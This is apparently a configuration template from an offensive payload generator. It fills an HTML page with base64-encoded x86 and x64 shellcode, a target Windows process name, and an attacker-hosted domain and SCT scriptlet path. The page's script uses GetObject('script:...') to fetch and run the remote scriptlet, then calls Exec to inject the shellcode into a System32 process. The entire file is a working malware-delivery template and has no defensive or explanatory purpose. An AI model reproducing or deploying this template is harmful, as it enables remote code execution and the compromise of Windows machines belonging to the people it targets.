[ShellCodex86]
value: notSet
process: b64Encode

[ShellCodex64]
value: notSet
process: b64Encode

[Process]
value: notSet

[HostedDomain]
value: notSet

[HostedSct]
value: notSet

[Template]
data:
	<html>
		<script>
			var a = GetObject('script:${HostedDomain:value}/${HostedSct:value}');
			var x86 = "${ShellCodex86:value}"
			var x64 = "${ShellCodex64:value}"
			a.Exec(x86, x64, 'C:\\Windows\\System32\\${Process:value}');
			close();
		</script>
	</html>
